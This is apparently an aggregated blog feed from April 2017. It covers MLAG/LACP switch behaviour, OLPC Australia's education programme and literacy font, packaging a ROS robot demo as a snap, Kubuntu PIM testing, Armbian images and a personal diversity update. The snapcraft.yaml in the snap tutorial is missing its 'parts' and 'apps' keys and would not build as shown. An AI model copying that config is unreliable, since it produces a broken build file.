According to the LACP spec (and our testing of several host bonding drivers confirms this), when a host receives an LACP-DU with a new system ID (222222), while the other link(s) are still up with the shared system ID (111111), the link with the changed system ID will be removed from the bundle and brought down. This is what would happen during a peerlink failure as shown above.

Wrapping up
Ok, well that was more of a novel than I originally planned to write. Hopefully I’ve done a little to bridge the gap between host networking and the implications with the upstream network.

The summary I’d like to present is this: In a fundamentally Active-Active network fabric, an Active-Active host connectivity option with standard state exchange mechanism is the way to go.

Of course, another option would be to do away with L2 all together and run a routing protocol on the host itself…. But that is an entirely different story for another day!

The post Sharing state between host and upstream network: LACP part 3 appeared first on Cumulus Networks Blog.

22 April, 2017 05:00PM by Doug Youd

hackergotchi for Ubuntu developers

Ubuntu developers

Sridhar Dhanapalan: Creating an Education Programme

OLPC Australia had a strong presence at linux.conf.au 2012 in Ballarat, two weeks ago.

I gave a talk in the main keynote room about our educational programme, in which I explained our mission and how we intend to achieve it.

Even if you saw my talk at OSDC 2011, I recommend that you watch this one. It is much improved and contains new and updated material. The YouTube version is above, but a higher quality version is available for download from Linux Australia.

The references for this talk are on our development wiki.

Here’s a better version of the video I played near the beginning of my talk:

I should start by pointing out that OLPC is by no means a niche or minor project. XO laptops are in the hands of 8000 children in Australia, across 130 remote communities. Around the world, over 2.5 million children, across nearly 50 countries, have an XO.

Investment in our Children’s Future

The key point of my talk is that OLPC Australia have a comprehensive education programme that highly values teacher empowerment and community engagement.

The investment to provide a connected learning device to every one of the 300 000 children in remote Australia is less than 0.1% of the annual education and connectivity budgets.

For low socio-economic status schools, the cost is only $80 AUD per child. Sponsorships, primarily from corporates, allow us to subsidise most of the expense (you too can donate to make a difference). Also keep in mind that this is a total cost of ownership, covering the essentials like teacher training, support and spare parts, as well as the XO and charging rack.

While our principal focus is on remote, low socio-economic status schools, our programme is available to any school in Australia. Yes, that means schools in the cities as well. The investment for non-subsidised schools to join the same programme is only $380 AUD per child.

Comprehensive Education Programme

We have a responsibility to invest in our children’s education — it is not just another market. As a not-for-profit, we have the freedom and the desire to make this happen. We have no interest in vendor lock-in; building sustainability is an essential part of our mission. We have no incentive to build a dependency on us, and every incentive to ensure that schools and communities can help themselves and each other.

We only provide XOs to teachers who have been sufficiently enabled. Their training prepares them to constructively use XOs in their lessons, and is formally recognised as part of their professional development. Beyond the minimum 15-hour XO-certified course, a teacher may choose to undergo a further 5-10 hours to earn XO-expert status. This prepares them to be able to train other teachers, using OLPC Australia resources. Again, we are reducing dependency on us.

OLPC Australia certificationsCertifications

Training is conducted online, after the teacher signs up to our programme and they receive their XO. This scales well to let us effectively train many teachers spread across the country. Participants in our programme are encouraged to participate in our online community to share resources and assist one another.

OLPC Australia online training processOnline training process

We also want to recognise and encourage children who have shown enthusiasm and aptitude, with our XO-champion and XO-mechanic certifications. Not only does this promote sustainability in the school and give invaluable skills to the child, it reinforces our core principle of Child Ownership. Teacher aides, parents, elders and other non-teacher adults have the XO-basics (formerly known as XO-local) course designed for them. We want the child’s learning experience to extend to the home environment and beyond, and not be constrained by the walls of the classroom.

There’s a reason why I’m wearing a t-shirt that says “No, I won’t fix your computer.” We’re on a mission to develop a programme that is self-sustaining. We’ve set high goals for ourselves, and we are determined to meet them. We won’t get there overnight, but we’re well on our way. Sustainability is about respect. We are taking the time to show them the ropes, helping them to own it, and developing our technology to make it easy. We fundamentally disagree with the attitude that ordinary people are not capable enough to take control of their own futures. Vendor lock-in is completely contradictory to our mission. Our schools are not just consumers; they are producers too.

As explained by Jonathan Nalder (a highly recommended read!), there are two primary notions guiding our programme. The first is that the nominal $80 investment per child is just enough for a school to take the programme seriously and make them a stakeholder, greatly improving the chances for success. The second is that this is a schools-centric programme, driven from grassroots demand rather than being a regime imposed from above. Schools that participate genuinely want the programme to succeed.

OLPC Australia programme cycleProgramme cycle

Technology as an Enabler

Enabling this educational programme is the clever development and use of technology. That’s where I (as Engineering Manager at OLPC Australia) come in. For technology to be truly intrinsic to education, there must be no specialist expertise required. Teachers aren’t IT professionals, and nor should they be expected to be. In short, we are using computers to teach, not teaching computers.

The key principles of the Engineering Department are:

  • Technology is an integral and seamless part of the learning experience – the pen and paper of the 21st century.
  • To eliminate dependence on technical expertise, through the development and deployment of sustainable technologies.
  • Empowering children to be content producers and collaborators, not just content consumers.
  • Open platform to allow learning from mistakes… and easy recovery.

OLPC have done a marvellous job in their design of the XO laptop, giving us a fantastic platform to build upon. I think that our engineering projects in Australia have been quite innovative in helping to cover the ‘last mile’ to the school. One thing I’m especially proud of is our instance on openness. We turn traditional systems administration practice on its head to completely empower the end-user. Technology that is deployed in corporate or educational settings is typically locked down to make administration and support easier. This takes control completely away from the end-user. They are severely limited on what they can do, and if something doesn’t work as they expect then they are totally at the mercy of the admins to fix it.

In an educational setting this is disastrous — it severely limits what our children can learn. We learn most from our mistakes, so let’s provide an environment in which children are able to safely make mistakes and recover from them. The software is quite resistant to failure, both at the technical level (being based on Fedora Linux) and at the user interface level (Sugar). If all goes wrong, reinstalling the operating system and restoring a journal (Sugar user files) backup is a trivial endeavour. The XO hardware is also renowned for its ruggedness and repairability. Less well-known are the amazing diagnostics tools, providing quick and easy indication that a component should be repaired/replaced. We provide a completely unlocked environment, with full access to the root user and the firmware. Some may call that dangerous, but I call that empowerment. If a child starts hacking on an XO, we want to hire that kid 🙂


My talk features the case study of Doomadgee State School, in far-north Queensland. Doomadgee have very enthusiastically taken on board the OLPC Australia programme. Every one of the 350 children aged 4-14 have been issued with an XO, as part of a comprehensive professional development and support programme. Since commencing in late 2010, the percentage of Year 3 pupils at or above national minimum standards in numeracy has leapt from 31% in 2010 to 95% in 2011. Other scores have also increased. Think what you may about NAPLAN, but nevertheless that is a staggering improvement.

In federal parliament, Robert Oakeshott MP has been very supportive of our mission:

Most importantly of all, quite simply, One Laptop per Child Australia delivers results in learning from the 5,000 students already engaged, showing impressive improvements in closing the gap generally and lifting access and participation rates in particular.

We are also engaged in longitudinal research, working closely with respected researchers to have a comprehensive evaluation of our programme. We will release more information on this as the evaluation process matures.

Join our mission

Schools can register their interest in our programme on our Education site.

Our Prospectus provides a high-level overview.

For a detailed analysis, see our Policy Document.

If you would like to get involved in our technical development, visit our development site.


Many thanks to Tracy Richardson (Education Manager) for some of the information and graphics used in this article.

22 April, 2017 12:28PM

Sridhar Dhanapalan: Interview with Australian Council for Computers in Education Learning Network

Adam Holt and I were interviewed last night by the Australian Council for Computers in Education Learning Network about our not-for-profit work to improve educational opportunities for children in the developing world.

We talked about One Laptop per Child, OLPC Australia and Sugar Labs. We discussed the challenges of providing education in the developing world, and how that compares with the developed world.

Australia poses some of its own challenges. As a country that is 90% urbanised, the remaining 10% are scattered across vast distances. The circumstances of these communities often share both developed and developing world characteristics. We developed the One Education programme to accommodate this.

These lessons have been developed further into Unleash Kids, an initiative that we are currently working on to support the community of volunteers worldwide and take to the movement to the next level.

22 April, 2017 12:14PM

Sridhar Dhanapalan: A Complete Literacy Experience For Young Children

From the “I should have posted this months ago” vault…

When I led technology development at One Laptop per Child Australia, I maintained two golden rules:

  1. everything that we release must ‘just work’ from the perspective of the user (usually a child or teacher), and
  2. no special technical expertise should ever be required to set-up, use or maintain the technology.

In large part, I believe that we were successful.

Once the more obvious challenges have been identified and cleared, some more fundamental problems become evident. Our goal was to improve educational opportunities for children as young as possible, but proficiently using computers to input information can require a degree of literacy.

Sugar Labs have done stellar work in questioning the relevance of the desktop metaphor for education, and in coming up with a more suitable alternative. This proved to be a remarkable platform for developing a touch-screen laptop, in the form of the XO-4 Touch: the icons-based user interface meant that we could add touch capabilities with relatively few user-visible tweaks. The screen can be swivelled and closed over the keyboard as with previous models, meaning that this new version can be easily converted into a pure tablet at will.

Revisiting Our Assumptions

Still, a fundamental assumption has long gone unchallenged on all computers: the default typeface and keyboard. It doesn’t at all represent how young children learn the English alphabet or literacy. Moreover, at OLPC Australia we were often dealing with children who were behind on learning outcomes, and who were attending school with almost no exposure to English (since they speak other languages at home). How are they supposed to learn the curriculum when they can barely communicate in the classroom?

Looking at a standard PC keyboard, you’ll see that the keys are printed with upper-case letters. And yet, that is not how letters are taught in Australian schools. Imagine that you’re a child who still hasn’t grasped his/her ABCs. You see a keyboard full of unfamiliar symbols. You press one, and on the screen pops up a completely different looking letter! The keyboard may be in upper-case, but by default you’ll get the lower-case variants on the screen.

A standard PC keyboardA standard PC keyboard

Unfortunately, the most prevalent touch-screen keyboard on the marke isn’t any better. Given the large education market for its parent company, I’m astounded that this has not been a priority.

The Apple iOS keyboardThe Apple iOS keyboard

Better alternatives exist on other platforms, but I still was not satisfied.

A Re-Think

The solution required an examination of how children learn, and the challenges that they often face when doing so. The end result is simple, yet effective.

The standard OLPC XO mechanical keyboard (above) versus the OLPC Australia Literacy keyboard (below)The standard OLPC XO mechanical keyboard (above) versus the OLPC Australia Literacy keyboard (below)

This image contrasts the standard OLPC mechanical keyboard with the OLPC Australia Literacy keyboard that we developed. Getting there required several considerations:

  1. a new typeface, optimised for literacy
  2. a cleaner design, omitting characters that are not common in English (they can still be entered with the AltGr key)
  3. an emphasis on lower-case
  4. upper-case letters printed on the same keys, with the Shift arrow angled to indicate the relationship
  5. better use of symbols to aid instruction

One interesting user story with the old keyboard that I came across was in a remote Australian school, where Aboriginal children were trying to play the Maze activity by pressing the opposite arrows that they were supposed to. Apparently they thought that the arrows represented birds’ feet! You’ll see that we changed the arrow heads on the literacy keyboard as a result.

We explicitly chose not to change the QWERTY layout. That’s a different debate for another time.

The Typeface

The abc123 typeface is largely the result of work I did with John Greatorex. It is freely downloadable (in TrueType and FontForge formats) and open source.

After much research and discussions with educators, I was unimpressed with the other literacy-oriented fonts available online. Characters like ‘a’ and ‘9’ (just to mention a couple) are not rendered in the way that children are taught to write them. Young children are also susceptible to confusion over letters that look similar, including mirror-images of letters. We worked to differentiate, for instance, the lower-case L from the upper-case i, and the lower-case p from the lower-case q.

Typography is a wonderfully complex intersection of art and science, and it would have been foolhardy for us to have started from scratch. We used as our base the high-quality DejaVu Sans typeface. This gave us a foundation that worked well on screen and in print. Importantly for us, it maintained legibility at small point sizes on the 200dpi XO display.

On the Screen

abc123 is a suitable substitute for DejaVu Sans. I have been using it as the default user interface font in Ubuntu for over a year.

It looks great in Sugar as well. The letters are crisp and easy to differentiate, even at small point sizes. We made abc123 the default font for both the user interface and in activities (applications).

The abc123 font in Sugar's Write activity, on an XO laptop screenThe abc123 font in Sugar’s Write activity, on an XO laptop screen

Likewise, the touch-screen keyboard is clear and simple to use.

The abc123 font on the XO touch-screen keyboard, on an XO laptop screenThe abc123 font on the XO touch-screen keyboard, on an XO laptop screen

The end result is a more consistent literacy experience across the whole device. What you press on the hardware or touch-screen keyboard will be reproduced exactly on the screen. What you see on the user interface is also what you see on the keyboards.

22 April, 2017 07:36AM

April 21, 2017

Ubuntu Insights: ROS production: our prototype as a snap [3/5]

This is a guest post by Kyle Fazzari, Software Engineer. If you would like to contribute a guest post, please contact ubuntu-devices@canonical.com

This is the third blog post in this series about ROS production. In the previous post we came up with a simple ROS prototype. In this post we’ll package that prototype as a snap. For justifications behind why we’re doing this, please see the first post in the series.

We know from the previous post that our prototype consists of a single launch file that we wrote, contained within our prototype ROS package. Turning this into a snap is very straight-forward, so let’s get started! Remember that this is also a video series: feel free to watch the video version of this post.


This post will assume the following:

  • You’ve followed the previous posts in this series
  • You know what snaps are, and have taken the tour
  • You have a store account at http://myapps.developer.ubuntu.com
  • You have a recent Snapcraft installed (2.28 is the latest as of this writing)

Create the snap

The first step toward a new snap is to create the snapcraft.yaml. Put that in the root of the workspace we created in the previous post:

$ cd ~/workspace
$ snapcraft init
Created snap/snapcraft.yaml.
Edit the file to your liking or run `snapcraft` to get started

Do as it says, and make that file look something like this:

name: my-turtlebot-snap  # This needs to be a unique name
version: '0.1'
summary: Turtlebot ROS Demo
description: |
  Demo of Turtlebot randomly wandering around, avoiding obstacles and cliffs.

grade: stable
confinement: devmode

    plugin: catkin
    rosdistro: kinetic
    catkin-packages: [prototype]

    command: roslaunch prototype prototype.launch --screen
    plugs: [network, network-bind]
    daemon: simple

Let’s digest that section by section.

name: my-turtlebot-snap
version: 0.1
summary: Turtlebot ROS Demo
description: |
  Demo of Turtlebot randomly wandering around, avoiding obstacles and cliffs.

This is the basic metadata that all snaps require. These fields are fairly self-explanatory. The only thing I want to point out specifically here is that the name must be globally unique among all snaps. If you’re following this tutorial, you might consider appending your developer name to the end of this example.

grade: stable
confinement: devmode

grade can be either stable or devel. If it’s devel, the store will prevent you from releasing into one of the two stable channels (stable and candidate, specifically)– think of it as a safety net to prevent accidental releases. If it’s stable, you can release it anywhere.

confinement can be strict, devmode, or classic. strict enforces confinement, whereas devmode allows all accesses, even those that would be disallowed under strict confinement (and logs accesses that would otherwise be disallowed for your reference). classic is even less confined than devmode, in that it doesn’t even get private namespaces anymore (among other things). There is more extensive documentation on confinement available.

I personally always use strict confinement unless I know for sure that the thing I’m snapping won’t run successfully under confinement, in which case I’ll use devmode. I typically avoid classic unless I never intend for the app to run confined. In this case, I know from experience this snap won’t run confined as-is, and will require devmode for now (more on that later).

    plugin: catkin
    rosdistro: kinetic
    catkin-packages: [prototype]

You learned about this in the Snapcraft tour, but I’ll cover it again real quick. Snapcraft is responsible for taking many disparate parts and orchestrating them all into one cohesive snap. You tell it the parts that make up your snap, and it takes care of the rest. Here, we tell Snapcraft that we have a single part called prototype-workspace. We specify that it builds with Catkin, and also specify that we’re using Kinetic here (as opposed to Jade, or the default, Indigo). Finally, we specify the packages in this workspace that we want included in the snap. In our case, we only have one: that prototype package we created in the previous post.

    command: roslaunch prototype prototype.launch --screen
    plugs: [network, network-bind]
    daemon: simple

This is where things get a little interesting. When we build this snap, it will include a complete ROS system: roscpp, roslib, roscore, roslaunch, your ROS workspace, etc. It’s a standalone unit: you’re in total control of how the user interacts with it. You exercise that control via the apps keyword, where you expose specific commands to the user. Here, we specify that this snap has a single app, called system. The command that this app actually runs within the snap is the roslaunch invocation we got from the previous post. We use plugs to specify that it requires network access (read more about interfaces), and finally specify that it’s a simple daemon. That means this app will begin running as soon as the snap is installed, and also run upon boot. All this, and the user doesn’t even need to know that this snap uses ROS!

That’s actually all we need to make our prototype into a snap. Let’s create the snap itself:

$ cd ~/workspace
$ snapcraft

That will take a few minutes. You’ll see Snapcraft fetch rosdep, which is then used to determine the dependencies of the ROS packages in the workspace. This is only prototype in our case, which you’ll recall from the previous post depends upon kobuki_node and kobuki_random_walker. It then pulls those down and puts them into the snap along with roscore. Finally, it builds the requested packages in the workspace, and installs them into the snap as well. At the end, you’ll have your snap.

Test the snap

Even though we’re planning on using this snap on Ubuntu Core, snaps run on classic Ubuntu as well. This is an excellent way to ensure that our snap runs as expected before moving on to Ubuntu Core. Since we already have our machine setup to communicate with the Turtlebot, we can try it out right here. The only hitch is that /dev/kobuki isn’t covered by any interface on classic Ubuntu (we can make this work for Ubuntu Core, though, more on that later). That’s why we used devmode as the confinement type in our snap. We’ll install it with devmode here:

$ sudo snap install --devmode path/to/my.snap

Right after this completes (give it a second for our app to fire up), you should hear the robot sing and begin moving. Once you remove the snap it’ll stop moving:

$ sudo snap remove my-turtlebot-snap

How easy is that? If you put that in the store, anyone with a Turtlebot (no ROS required) could snap install it and it would immediately begin moving just like it did for you. In fact, why don’t we put it in the store right now?

Put the snap in the store

Step 1: Tell Snapcraft who you are

We’re about to use Snapcraft to register and upload a snap using the store account you created when satisfying the prerequisites. For that to happen, you need to sign in with Snapcraft:

$ snapcraft login

Step 2: Register the snap name

Snap names are globally unique, so only one developer can register and publish a snap with a given name. Before you can publish the snap, you need to make sure that snap name is registered to you (note that this corresponds to the name field in the snapcraft.yaml we created a few minutes ago):

$ snapcraft register <my snap name>

Assuming that name is available, you can proceed to upload it.

Step 3: Release the snap

In the tour you learned that there are four channels available by default. In order of increasing stability, these channels are edge, beta, candidate, and stable. This snap isn’t quite perfect yet since it still requires devmode, so let’s release it on the beta channel:

$ snapcraft push path/to/my.snap --release=beta

Once the upload and automated reviews finish successfully, anyone in the world can install your snap on the computer controlling their Turtlebot as simply as:

$ sudo snap install --beta --devmode my-turtlebot-snap

In the next post in this series, we’ll discuss how to obtain real confined access to the Turtlebot’s udev symlink on Ubuntu Core by creating a gadget snap, moving toward our goal of having a final image with this snap pre-installed and ready to ship.

Original source here.

21 April, 2017 09:40AM

Rhonda D'Vine: Home

A fair amount of things happened since I last blogged something else than music. First of all we did actually hold a Debian Diversity meeting. It was quite nice, less people around than hoped for, and I account that to some extend to the trolls and haters that defaced the titanpad page for the agenda and destroyed the doodle entry for settling on a date for the meeting. They even tried to troll my blog with comments, and while I did approve controversial responses in the past, those went over the line of being acceptable and didn't carry any relevant content.

One response that I didn't approve but kept in my mailbox is even giving me strength to carry on. There is one sentence in it that speaks to me: Think you can stop us? You can't you stupid b*tch. You have ruined the Debian community for us. The rest of the message is of no further relevance, but even though I can't take credit for being responsible for that, I'm glad to be a perceived part of ruining the Debian community for intolerant and hateful people.

A lot of other things happened since too. Mostly locally here in Vienna, several queer empowering groups were founding around me, some of them existed already, some formed with the help of myself. We now have several great regular meetings for non-binary people, for queer polyamory people about which we gave an interview, a queer playfight (I might explain that concept another time), a polyamory discussion group, two bi-/pansexual groups, a queer-feminist choir, and there will be an European Lesbian* Conference in October where I help with the organization …

… and on June 21st I'll finally receive the keys to my flat in Que[e]rbau Seestadt. I'm sooo looking forward to it. It will be part of the Let me come Home experience that I'm currently in. Another part of that experience is that I started changing my name (and gender marker) officially. I had my first appointment in the corresponding bureau, and I hope that it won't last too long because I have to get my papers in time for booking my flight to Montreal, and somewhen along the process my current passport won't contain correct data anymore. So for the people who have it in their signing policy to see government IDs this might be your chance to finally sign my key then.

I plan to do a diversity BoF at debconf where we can speak more directly on where we want to head with the project. I hope I'll find the time to do an IRC meeting beforehand. I'm just uncertain how to coordinate that one to make it accessible for interested parties while keeping the destructive trolls out. I'm open for ideas here.

/personal | permanent link | Comments: 3 | Flattr this

21 April, 2017 08:01AM

Kubuntu General News: KDE PIM update for Zesty available for testers

Since we missed by a whisker getting updated PIM (kontact, kmail, akregator, kgpg etc..) into Zesty for release day, and we believe it is important that our users have access to this significant update, packages are now available for testers in the Kubuntu backports landing ppa.

While we believe these packages should be relatively issue-free, please bear in mind that they have not been tested as comprehensively as those in the main ubuntu archive.

Testers should be prepared to troubleshoot and hopefully report issues that may occur. Please provide feedback on our mailing list [1], IRC [2], or optionally via social media.

After a period of testing and verification, we hope to move this update to the main backports ppa.

You should have some command line knowledge before testing.
Reading about how to use ppa purge is also advisable.

How to test KDE PIM 16.12.3 for Zesty:

Testing packages are currently in the Kubuntu Backports Landing PPA.

sudo add-apt-repository ppa:kubuntu-ppa/backports-landing
sudo apt-get update
sudo apt-get dist-upgrade

1. Kubuntu-devel mailing list: https://lists.ubuntu.com/mailman/listinfo/kubuntu-devel
2. Kubuntu IRC channels: #kubuntu & #kubuntu-devel on irc.freenode.net

21 April, 2017 01:31AM

April 20, 2017

hackergotchi for ARMBIAN


Orange Pi Win

Ubuntu server – mainline kernel
Command line interface – server usage scenarios.


Ubuntu desktop – mainline kernel
Server and light desktop usage scenarios.


  Other images     Board family info     Forums     HW details     Card burning tool


Quick start | Documentation


Make sure you have a good & reliable SD card and a proper power supply. Archives can be uncompressed with 7-Zip on Windows, Keka on OS X and 7z on Linux (apt-get install p7zip-full). RAW images can be written with Etcher (all OS).


Insert SD card into a slot and power the board. First boot takes around 3 minutes then it might reboot and you will need to wait another one minute to login. This delay is because system creates 128Mb emergency SWAP and expand SD card to it’s full capacity. Worst case scenario boot (with DHCP) takes up to 35 seconds.


Login as root on HDMI / serial console or via SSH and use password 1234. You will be prompted to change this password at first login. Next you will be asked to create a normal user account that is sudo enabled (beware of default QWERTY keyboard settings at this stage).

20 April, 2017 05:37PM by igorpecovnik

Cumulus Linux

How MLAG interacts with the host: LACP part 2

In part1, we discussed some of the design decisions around uplink modes for VMware and a customer scenario I was working through recently. In this post, we’ll explore multi-chassis link aggregation (MLAG) in some detail and how active-active network fabrics challenge some of the assumptions made.

Disclaimer: What I’m going to describe is based on network switches running Cumulus Linux and specifically some down-in-the-weeds details on this particular MLAG implementation. That said, most of the concepts apply to similar network technologies (VPC, other MLAG implementations, stacking, virtual-chassis, etc.) as they operate in very similar ways. But YMMV.

I originally set out to write this as a single article, but to explain the nuances it quickly spiraled beyond that. So I decided to split it up into a few parts.

So let’s explore MLAG in some detail

If the host is connected to two redundant switches (which these days is all but assumed), then MLAG (and equivalent solutions) is a commonly deployed option. In simple terms, the independent switches act as a single logical switch, which allows them to do somewhat unnatural things — like form a bond/port-channel/ LAG to a destination from 2 physically separate switches.

That bond is often the uplink up to an aggregation layer (also commonly an MLAG pair). The big advantage is utilizing all your uplink bandwidth, instead of having half blocked by spanning-tree. Bonds can also be formed to the hosts; with or without LACP.


Figure 1a: 2-Tier MLAG

Another common deployment is to use MLAG purely at the top-of-rack and route above that layer. With NSX becoming more common, this deployment is getting more popular. I covered one of the other caveats previously in “Routed vMotion: why“. That caveat has since been resolved in vSphere 6. So one less reason not to move to an L3 Clos fabric.


Figure 1a: MLAG ToRs + L3 Uplink

In this particular case, the design was a proof-of-concept, so it was just a pair of switches for now, with an uplink up to a router/firewall device.

The thing that the above designs have in common is the northbound fabric is natively Active-Active and traffic is hashed across all links, either with an L2 bond (normally LACP) or Equal-Cost-Multi-Pathing (ECMP). This has impacts on the design choice for host connectivity due to the way traffic is forwarded.

So let’s dive a little deeper on how MLAG actually forms a bond across 2 switches.

Figure 2a: MLAG + LACP Basic overview

A single-port bond is defined on both switches and assigned an ID to indicate to the MLAG processes/daemons that these ports connect to the same host, which marks it as “dual-connected”. The same is done for any northbound links, normally they are added to a bond named “uplink” or something similar. In the uplink scenario (figure 1a) the bond is actually a 4-way bond (2 links from each TOR up to both aggregation switches, which are also acting as a single MLAG-pair).

The definition of a bond states that the member interfaces should be treated as a single logical interface. This influences how learned MAC addresses on the interfaces are treated and also how STP will treat the member ports (ie leaving them all active). In practice, MLAG must share locally learned MAC’s to its peer and the peer will program those same MACs onto the dual connected member ports.

Those bonds are then added as members of a bridge, which allows traffic forwarding between the ports at L2.

Host ports can also be attached straight to the bridge, without the bond defined at all. In this configuration, each host port is treated as a single-attached edge port. If there are multiple bridge ports connected to a single host, the switches are completely oblivious to this fact. In networking circles, this is often referred to as an “orphan port”.

Figure 2b: MLAG w/o LACP (Orphan ports)

Let’s now look at how traffic flows in an MLAG environment, both with the host-facing bonds configured and not.

For the example, let’s consider a simple design of 2 top-of-rack switches, 2 hosts each with 4 VMs.


Figure 3a: MLAG w/ LACP

So when the first packet is sent from VM1 to VM8, the LACP driver will determine which uplink to use based on a hashing algorithm. Initially, I’m showing traffic egressing using NIC1, but that is entirely arbitrary. When the packet hits the switch a few things happen fairly almost immediately:

  1. Switch1: The source MAC ending “A1:A1” on the frame is learned on the bond “host1”.
  2. Switch1: Frame is sent to the bridge. Since the destination MAC is not known, it is flooded out all ports.
  3. Switch2: Frame received across ISL, since no single attached hosts are present on the bridge, the frame is ignored and dropped.
  4. Switch1: The MLAG daemon is notified of a new learned MAC on a dual-connected host. So it forwards this information to the MLAG daemon on switch2.
  5. Switch2: The MLAG daemon receives the new MAC notification and programs the MAC onto the bond “host1”.

The frame is sent to ESX2 from Switch1 during the flood operation and sent to VM8 by ESX2 vSwitch.


Figure 3b: MLAG w/ LACP: Reply traffic flow

Now let’s consider the reply path from VM8 to VM1. Again the LACP bonding driver will make a hashing decision, let’s assume it selects NIC2. Again, a bunch of processes occur at switch2 almost instantly.

  1. Switch2: The source MAC ending “B4:B4” on the frame is learned on the bond “host2”
  2. Switch2: Frame is sent to the bridge. Destination MAC is known via interface “host1”. Frame is sent via port “Host1”
  3. Switch2: The MLAG daemon is notified of a new learned MAC on a dual-connected host. So it forwards this information to the MLAG daemon on switch1.
  4. Switch1: The MLAG daemon receives the new MAC notification and programs the MAC onto the bond “host2”

Notice the only packet to cross the ISL is the initial flooded packet. This packet doesn’t end up utilizing unnecessary uplink bandwidth or get forwarded to the host across both links, due to some forwarding rules enforced by MLAG. File this one under #DarkMagic for now, but it’s one of the traffic optimizations that can be done if the network devices know about topology information, in this case if a host is dual-connected or not.


Figure 3c: All hosts sending traffic (after initial learning).

After the initial flow, let’s consider a more real-world scenario of all VMs communicating with each other. I’m simplifying a little by assuming the initial flood + learn has already occurred.

Aside from a fairly messy diagram, you can see that the traffic flow is optimal from the network switch perspective. Since MACs are known on both sides of the MLAG pair, the switches can use the directly connected link to each host and avoid an extra hop over the ISL.

From the host perspective, this does mean that the traffic flow is asymmetric; Traffic sent from nic1 could receive a reply from nic2. This is caused by the path selection at the destination being completely independent of the source hash selection. But I would submit this fundamentally does not matter, since nic1 and nic2 are treated as single logical uplink group.

It’s worth noting that this traffic flow is fundamentally identical if you used “static bonds” at the switch and “route based on IP Hash” at the host. But you still lose the bi-directional sync of topology change data described in Part3 “ships in the night”. Lack of topology information transfer can cause problems if the topology changes, which I’ll also explain in a Part3 (spoiler: it’s the reason the conversation triggering this blog occurred in the first place)

Traffic flow with “orphan ports”

Now let’s consider the alternative: host-facing ports configured as regular switch-ports (ie not ‘dual connected’ from MLAG’s perspective).

Firstly, there’s one thing to get your head around: VMware networking is active-passive by default. For a given MAC / virtual port on a vSwitch traffic will be pinned to a single uplink port / physical NIC. LACP and “route-based on IP HASH” are the exceptions to this rule. This is important as it impacts how MAC learning is performed in the ToR switches. Even Load-Based Teaming is active-passive, it just migrates MACs/virtual ports to balance egress traffic and assumes the upstream switches take care of the rest.

Firugre 4a: MLAG w/o LACP

As with the previous example, let’s walk through the traffic flow, starting with the first packet from a given MAC.

This time, traffic from a given MAC is pinned to a particular uplink. VM1 is sending via uplink1. As before the traffic hits Switch1 and a bunch happens at once:

  1. Switch1: MAC ending A1A1 is learned on port1
  2. Switch1: Frame is sent to the bridge. Destination MAC is unknown, so it floods out all ports (except the one it was received on).
  3. Switch1: MLAG daemon is notified of a new MAC on an orphan port, so forwards this info to MLAG daemon on switch2.
  4. Switch2: The MLAG daemon receives orphan-port information, programs the MAC onto the ISL.
  5. Switch2: Frame received on ISL. Sent to bridge and flooded out all orphan ports.

The frame will be received twice by ESX2 and once by ESX1. Two frames will be forwarded to the VM (duplicate packet) and it will be dropped at ESX1, since the destination MAC is not present on the vSwitch. Not exactly an ideal forwarding situation and it will happen for every BUM packet, also note that in this case VM1’s MAC ending A1A1 is learned via the ISL, let’s now see how the reply will flow.


Figure 4b: MLAG without Bonds; Reply traffic flow

In this example, VM8 is pinned to NIC2, so it reply will hit switch2 first. Then the following happens:

  1. Switch2: MAC ending B4B4 is learned on port16.
  2. Switch2: Frame is sent to the bridge. Destination MAC ending A1A1 is known via ISL, frame is forwarded via ISL.
  3. Switch2: MLAG daemon is notified of a new MAC on an orphan port, so forwards this info to MLAG daemon on switch1.
  4. Switch1: The MLAG daemon receives orphan-port information, programs the MAC onto the ISL.
  5. Switch1: Frame received on ISL. Sent to bridge, MAC ending A1A1 known via port1, forwarded to ESX1 via port1.

So let’s recap: duplicate packets (due to standard ethernet flood+learn behavior), traffic utilizing ISL when a direct path exists and traffic sent over all host-facing links needlessly.


Figure 4c: MLAG without bonds; Full traffic example

Let’s see how this expands out with the same scaled-out example as before; all VMs sending to each other.

  • All VM’s pinned to uplink1 (VM1, VM2, VM5 and VM6) will cause those destination MACs to be learned via Switch1.
  • All VM’s pinned to uplink2 (VM3, VM4, VM7 and VM8) will cause those destination MACs to be learned via Switch2.

Regardless of which link a frame is received on, it must go to the switch where the destination MAC is known. So statistically, approximately 50% of all traffic will go via the ISL. That’s a design consideration worth noting. Figure 3c only shows half the flows to simplify the diagram a little.

Consider a rack with 20 ESXi hosts with dual 10g uplinks configured in this way, the ISL could see up to 200gbit/sec of bandwidth crossing it, burning 5x 40g interfaces is a pretty expensive way to workaround a design problem. Realistically, that scenario is not likely to occur often, unless a broken link is left unfixed.

However, this behavior is more likely to occur during burst events… in such cases the problem will normally manifest as a transient egress buffer queue drop on the ISL interface or sometimes an ingress queue drop, depending on which underlying ASIC is used in the switch.

Suffice to say, this is typically very difficult to troubleshoot effectively (likely a cross-functional finger pointing exercise).

All of that said, this design does have a couple of things going for it:

  • The host config is relatively simple to understand
  • A combination of any of the active-passive and static-assignment modes described in part 1 can be used on the hosts (potentially a few at once, for different traffic types).
  • Symmetric traffic flow
  • If the host networking configuration is changed at any time in the future, the switches will dynamically learn about it by a MAC-move.

That last point is a one to keep in mind as we go to the next (and final) article Part 3 – Ships in the night.

The post How MLAG interacts with the host: LACP part 2 appeared first on Cumulus Networks Blog.

20 April, 2017 03:16PM by Doug Youd

hackergotchi for Ubuntu developers

Ubuntu developers

Ubuntu Podcast from the UK LoCo: S10E07 – Black Frail Silver - Ubuntu Podcast

We spend some time discussing one rather important topic in the news and that’s the announcement of Ubuntu’s re-focus from mobile and convergence to the cloud and Internet of Things.

It’s Season Ten Episode Seven of the Ubuntu Podcast! Alan Pope, Mark Johnson, Martin Wimpress and Emma Marshall are connected and speaking to your brain.

In this week’s show:

That’s all for this week! If there’s a topic you’d like us to discuss, or you have any feedback on previous shows, please send your comments and suggestions to show@ubuntupodcast.org or Tweet us or Comment on our Facebook page or comment on our Google+ page or comment on our sub-Reddit.

20 April, 2017 02:00PM

Colin King: Tracking CoverityScan issues on Linux-next

Over the past 6 months I've been running static analysis on linux-next with CoverityScan on a regular basis (to find new issues and fix some of them) as well as keeping a record of the defect count.

Since the beginning of September over 2000 defects have been eliminated by a host of upstream developers and the steady downward trend of outstanding issues is good to see.  A proportion of the outstanding defects are false positives or issues where the code is being overly zealous, for example, bounds checking where some conditions can never happen. Considering there are millions of lines of code, the defect rate is about average for such a large project.

